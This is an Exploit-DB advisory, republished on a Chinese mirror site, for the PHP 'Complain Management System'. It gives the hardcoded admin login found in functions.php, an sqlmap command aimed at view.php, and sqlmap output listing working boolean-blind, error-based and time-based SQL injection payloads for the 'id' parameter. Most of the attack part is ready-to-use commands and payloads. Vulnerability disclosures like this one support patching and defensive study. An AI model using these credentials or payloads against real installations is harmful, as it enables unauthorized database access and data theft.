Complain Management System – Hard-Coded Credentials / Blind SQL injection

• Exploit Database
• 99 阅读

• 作者： havysec
  日期： 2017-10-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/42968/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60

  # Exploit Title : Complain Management System Blind SQL Injection # Date: 10 October 2017 # Exploit Author: havysec # Tested on: ubuntu14.04 # Vendor: https://sourceforge.net/projects/complain-management-system/ # Version: not supplied # Download Software: https://sourceforge.net/projects/complain-management-system/files   ## About The Product : Complain Management is a Web based project used to manage Customer's complain Online. User can login, and Create complain, view complain details and track the status of its complain. ## Vulnerability : The functions.php file line 88 has hardcoded admin credentials. elseif($uType == 'admin'){ //$_SESSION['user_id'] = $row['sid']; if($userName == 'admin' && $password == 'admin123'){ $_SESSION['user_id'] = 0; $_SESSION['user_name'] = 'Administrator'; $_SESSION['user_type'] = 'admin'; header('Location: '.WEB_ROOT.'index.php'); exit; Using the hardcoded admin credentials we then have access to the view.php file that is vulnerable to Blind SQL injection. -HTTP Method : GET - Sqlmap command: sqlmap -u 'http://192.168.1.104/view.php?mod=admin&view=repod&id=plans' --cookie="PHPSESSID=t1bc9vj67odrj3bd096g0rffe0" - Sqlmap Output : injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] [00:47:53] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') [00:47:53] [INFO] testing 'MySQL UNION query (98) - 22 to 40 columns' [00:47:53] [INFO] testing 'MySQL UNION query (98) - 42 to 60 columns' [00:47:53] [INFO] testing 'MySQL UNION query (98) - 62 to 80 columns' [00:47:54] [INFO] testing 'MySQL UNION query (98) - 82 to 100 columns' GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 650 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: mod=admin&view=repod&id=plans WHERE 6586=6586 AND 9310=9310#   Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: mod=admin&view=repod&id=plans WHERE 3317=3317 AND (SELECT 4063 FROM(SELECT COUNT(*),CONCAT(0x7176767a71,(SELECT (ELT(4063=4063,1))),0x7170766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--   Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: mod=admin&view=repod&id=plans WHERE 4122=4122 AND (SELECT * FROM (SELECT(SLEEP(5)))zWVH)-- --- [00:47:57] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS: MySQL 5.0 [00:47:57] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 444 times